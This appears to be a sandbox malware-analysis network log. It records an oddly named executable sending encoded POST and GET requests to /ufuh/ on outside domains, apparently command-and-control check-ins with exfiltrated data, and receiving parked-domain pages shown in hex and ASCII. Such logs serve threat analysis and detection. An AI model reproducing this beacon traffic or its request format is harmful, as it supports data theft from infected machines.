                                Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                May 20, 2024 08:55:14.519736052 CEST1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                May 20, 2024 08:55:14.519771099 CEST1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                May 20, 2024 08:55:14.519804955 CEST1236INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                                Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                May 20, 2024 08:55:14.524478912 CEST878INData Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                                Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                8192.168.2.2249173194.9.94.86802108C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe
                                TimestampBytes transferredDirectionData
                                May 20, 2024 08:55:16.405143023 CEST746OUTPOST /ufuh/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate, br
                                Content-Length: 201
                                Cache-Control: no-cache
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.xn--matfrmn-jxa4m.se
                                Origin: http://www.xn--matfrmn-jxa4m.se
                                Referer: http://www.xn--matfrmn-jxa4m.se/ufuh/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                Data Raw: 38 34 4f 30 3d 45 41 4e 63 46 47 39 32 58 46 4e 61 36 69 73 31 51 6c 47 32 31 54 71 78 36 42 4b 78 6d 6f 64 55 63 66 67 6e 68 44 72 59 4f 32 50 77 69 42 51 37 47 56 57 59 63 7a 42 6b 41 37 74 77 58 37 47 65 58 4b 34 6e 76 73 4f 6d 67 4f 61 64 43 4c 4a 79 31 44 37 47 37 35 68 66 51 63 62 73 6a 64 63 59 44 56 51 65 68 71 59 35 6d 66 62 59 4c 55 59 69 78 59 6a 2b 65 66 6f 48 41 46 37 6b 67 75 4e 56 62 44 4e 30 59 65 75 65 79 6d 41 45 66 5a 4d 61 52 47 33 65 45 6b 38 30 72 31 77 4a 4d 58 55 65 62 79 4a 75 36 36 67 67 47 6d 4a 4f 51 56 5a 71 4f 6e 54 4f 6a 46 36 57 55 44 77 76 61 55 4a 7a 6e 51 3d 3d
                                Data Ascii: 84O0=EANcFG92XFNa6is1QlG21Tqx6BKxmodUcfgnhDrYO2PwiBQ7GVWYczBkA7twX7GeXK4nvsOmgOadCLJy1D7G75hfQcbsjdcYDVQehqY5mfbYLUYixYj+efoHAF7kguNVbDN0YeueymAEfZMaRG3eEk80r1wJMXUebyJu66ggGmJOQVZqOnTOjF6WUDwvaUJznQ==


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                9192.168.2.2249174194.9.94.86802108C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe
                                TimestampBytes transferredDirectionData
                                May 20, 2024 08:55:19.127932072 CEST2472OUTPOST /ufuh/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate, br
                                Content-Length: 3625
                                Cache-Control: no-cache
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.xn--matfrmn-jxa4m.se
                                Origin: http://www.xn--matfrmn-jxa4m.se
                                Referer: http://www.xn--matfrmn-jxa4m.se/ufuh/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                Data Raw: 38 34 4f 30 3d 45 41 4e 63 46 47 39 32 58 46 4e 61 37 43 38 31 63 6d 2b 32 69 6a 71 79 6d 78 4b 78 76 49 64 51 63 66 73 6e 68 48 54 49 4f 45 6a 77 69 32 55 37 49 58 4f 59 61 7a 42 6b 47 37 74 73 5a 62 48 62 58 4b 74 63 76 74 2b 59 67 4e 71 64 43 73 4e 79 7a 48 62 5a 69 5a 68 64 62 38 62 76 6a 64 64 63 44 56 41 43 68 71 4e 55 6d 62 33 59 4c 43 6b 69 6d 59 6a 39 43 76 6f 48 41 46 37 53 67 75 4d 45 62 44 55 68 59 66 6d 4f 79 56 6f 45 66 34 73 61 58 68 6a 64 43 6b 38 77 6d 56 78 52 4e 79 30 56 63 79 68 6d 7a 5a 30 66 4a 6b 59 6a 54 6b 4a 70 49 6b 33 5a 6b 58 2f 36 4b 6d 42 2f 53 58 6b 72 39 7a 68 39 2f 6e 71 73 42 76 5a 78 4f 2f 41 35 58 6e 55 69 75 31 45 61 4c 63 69 75 59 4f 50 43 55 43 73 54 71 4a 70 6e 51 44 68 57 71 73 63 41 38 63 2f 31 68 75 59 5a 63 73 6d 77 67 73 4f 6e 5a 2f 2b 63 5a 52 51 47 65 45 69 37 71 6b 79 48 30 4a 36 2b 75 44 70 51 45 57 77 72 73 77 67 4a 64 4c 53 6a 4e 4f 34 32 57 43 78 62 2f 44 6f 59 6a 4c 48 49 36 38 66 6e 56 77 31 61 72 71 7a 67 61 37 38 4d 57 4b 57 67 71 4b 68 42 2f [TRUNCATED]
                                Data Ascii: 84O0=EANcFG92XFNa7C81cm+2ijqymxKxvIdQcfsnhHTIOEjwi2U7IXOYazBkG7tsZbHbXKtcvt+YgNqdCsNyzHbZiZhdb8bvjddcDVAChqNUmb3YLCkimYj9CvoHAF7SguMEbDUhYfmOyVoEf4saXhjdCk8wmVxRNy0VcyhmzZ0fJkYjTkJpIk3ZkX/6KmB/SXkr9zh9/nqsBvZxO/A5XnUiu1EaLciuYOPCUCsTqJpnQDhWqscA8c/1huYZcsmwgsOnZ/+cZRQGeEi7qkyH0J6+uDpQEWwrswgJdLSjNO42WCxb/DoYjLHI68fnVw1arqzga78MWKWgqKhB/mcH3CMkgrmmdcj9XxEJho0iJ9AqstlAk++1kmInN6+rZBTZvj7OSi+PS9bxyp+gvTXKIpGkvm6udyL9dx5m6ssvUCC/hvIcUvfwuJ2P1liTSHyHPhc9pgZ1yDSOfErmQnYRpB7mBMipvQWdBhMmgN8Q5jXuDJpvva59AIabfMkhLGfDHAddKOaRn2Wbj7iuYNiMUJLrRqhXmApbPnjYZLbcYrzJzO5d070ZcggLaK+NgkdtDzENMiUnh+nhGGXuL24bkm2Ri1ZF7gj30bYl0xjJpEfdeW92Mz+fAB4DIcVpxWRsOz1qWVH7PF0YLXTapSunqsCNXy9apagjRmRa2nvCpjb9733D+4X7rbB9MlCDH64vQIAl+PBIumBXT4eg+yZXHaSsYirG3iS5LtcsIbSMGoYXOLoRCUwOpNsKMOGCxi7P4sJhO90c+bpBOeFmLBwi5/sru2AtiGO8LLlpjhhmBgvaCUgRX5chetm3phNVbaj8w9pMPcDklfqyt0vLsFKGubuh8cASq3JVoSOQ7G5CRRHnB5n4NBZ1aJCSkuOwDTlLElclj+wTIkLIzdSBZqqP7TpYmpLRYN8/HzgLCH+ilm9NybLKUQEcysmPBLgzHde1D44u6gvplR+rn9dK1L+T7ayBONZ74umC/dQpi3A5pG0ddih0TQp [TRUNCATED]
                                May 20, 2024 08:55:19.132879972 CEST1699OUTData Raw: 36 44 47 79 2f 70 7a 4c 45 6e 32 32 6e 2b 6a 2b 6b 36 49 6c 7a 73 56 56 2f 49 48 51 4f 62 34 53 48 53 69 65 76 69 34 52 4c 49 76 58 74 31 75 51 76 44 56 69 50 51 63 49 4e 63 6e 43 78 77 79 36 6b 34 31 2b 79 63 6c 77 53 56 66 57 38 51 46 58 77 65
                                Data Ascii: 6DGy/pzLEn22n+j+k6IlzsVV/IHQOb4SHSievi4RLIvXt1uQvDViPQcINcnCxwy6k41+yclwSVfW8QFXwe3Qoo8kum0Rc9/mllSHAkBDhk+N3M6TYMYsahxbdkeXqrJXdPCb+yAuTXwpHTG+mWLrs1WNis/uPn+pef6UrzxsL/P/dSPHoWRWIB9OdaoNBJDDZwcdli5QKYrFm9VpSN7Y725/k4uSralC3XEzetlRfitUqPjdDXb
                                May 20, 2024 08:55:19.799331903 CEST1236INHTTP/1.1 200 OK
                                Server: nginx
                                Date: Mon, 20 May 2024 06:55:19 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                X-Powered-By: PHP/8.1.24
                                Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                May 20, 2024 08:55:19.799351931 CEST224INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
                                May 20, 2024 08:55:19.801779032 CEST1236INData Raw: 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65
                                Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
                                May 20, 2024 08:55:19.804297924 CEST1236INData Raw: 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61
                                Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
                                May 20, 2024 08:55:19.804316998 CEST448INData Raw: 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70 69 61 20 43 75 73 74 6f 6d 65 72 20
                                Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
                                May 20, 2024 08:55:19.804348946 CEST1236INData Raw: 65 74 20 73 74 61 72 74 65 64 20 77 69 74 68 20 79 6f 75 72 20 77 65 62 73 69 74 65 2c 20 65 6d 61 69 6c 2c 20 62 6c 6f 67 20 61 6e 64 20 6f 6e 6c 69 6e 65 20 73 74 6f 72 65 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 3c 75 6c 3e 0a 09 09 09
                                Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
                                May 20, 2024 08:55:19.804367065 CEST206INData Raw: 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 73 75 70 70 6f 72 74 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70
                                Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                10192.168.2.2249175194.9.94.86802108C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe
                                TimestampBytes transferredDirectionData
                                May 20, 2024 08:55:21.654726028 CEST474OUTGET /ufuh/?-Hc=N8_LbDFHuLL4ejZ&84O0=JCl8GzBEdF4l5nIyfkeq0ia6oie6u6lAQeoh+x3kN0jP8DE3DVbhST9RD9xIYa+bXtx9nrjGgO+XENgp6DrguLhYbN7qtNMSCWk+pZJhu575eHJRgqTZAIE4NheL HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.5
                                Connection: close
                                Host: www.xn--matfrmn-jxa4m.se
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                May 20, 2024 08:55:22.356550932 CEST1236INHTTP/1.1 200 OK
                                Server: nginx
                                Date: Mon, 20 May 2024 06:55:22 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                X-Powered-By: PHP/8.1.24
                                Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                May 20, 2024 08:55:22.362170935 CEST1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                May 20, 2024 08:55:22.362186909 CEST1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                May 20, 2024 08:55:22.362201929 CEST672INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                                Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                May 20, 2024 08:55:22.366945028 CEST1236INData Raw: 65 74 20 73 74 61 72 74 65 64 20 77 69 74 68 20 79 6f 75 72 20 77 65 62 73 69 74 65 2c 20 65 6d 61 69 6c 2c 20 62 6c 6f 67 20 61 6e 64 20 6f 6e 6c 69 6e 65 20 73 74 6f 72 65 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 3c 75 6c 3e 0a 09 09 09
                                Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
                                May 20, 2024 08:55:22.366986990 CEST206INData Raw: 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 73 75 70 70 6f 72 74 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70
                                Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                11192.168.2.224917691.195.240.19802108C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe
                                TimestampBytes transferredDirectionData
                                May 20, 2024 08:55:27.409249067 CEST2472OUTPOST /ufuh/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate, br
                                Content-Length: 2161
                                Cache-Control: no-cache
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.primeplay88.org
                                Origin: http://www.primeplay88.org
                                Referer: http://www.primeplay88.org/ufuh/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                Data Raw: 38 34 4f 30 3d 6a 44 58 71 4f 62 6b 69 45 6a 42 59 51 32 6a 70 48 61 45 46 55 52 6f 69 39 38 37 5a 78 7a 6b 4b 6d 54 4b 46 59 53 55 45 50 75 39 67 4f 62 53 4d 73 31 33 4f 49 6d 71 64 48 50 70 76 30 6c 5a 70 41 43 69 43 58 51 41 67 47 63 50 57 47 61 43 32 4e 50 6b 77 71 31 31 54 44 33 62 31 31 52 45 58 30 2b 35 78 4f 76 54 47 54 55 72 76 51 45 4e 4c 43 64 48 47 2f 32 59 48 36 72 35 6a 4d 4b 76 45 69 4e 54 42 30 56 68 7a 44 33 66 49 6e 78 54 39 6b 35 71 2b 41 51 45 46 65 51 79 4a 61 36 66 6c 49 53 69 30 63 55 41 61 54 4f 61 70 31 4c 52 6c 72 53 45 79 35 41 52 41 37 2f 56 77 76 46 43 77 65 70 54 34 75 6b 56 45 52 44 65 56 33 44 2f 37 48 62 4e 57 50 57 44 41 4e 6f 75 52 31 74 71 51 43 75 31 77 61 6b 43 37 48 79 6d 53 38 2b 71 77 30 77 32 76 2b 72 31 48 71 52 47 79 4b 7a 59 35 73 65 79 42 78 38 66 48 4f 43 61 2f 4a 76 72 68 6f 59 4c 78 41 64 64 6a 6c 6a 73 42 38 57 4d 4f 77 73 69 38 77 43 39 51 7a 32 77 51 41 56 70 63 32 2f 48 2b 41 78 6b 64 78 4b 7a 6e 74 4c 52 35 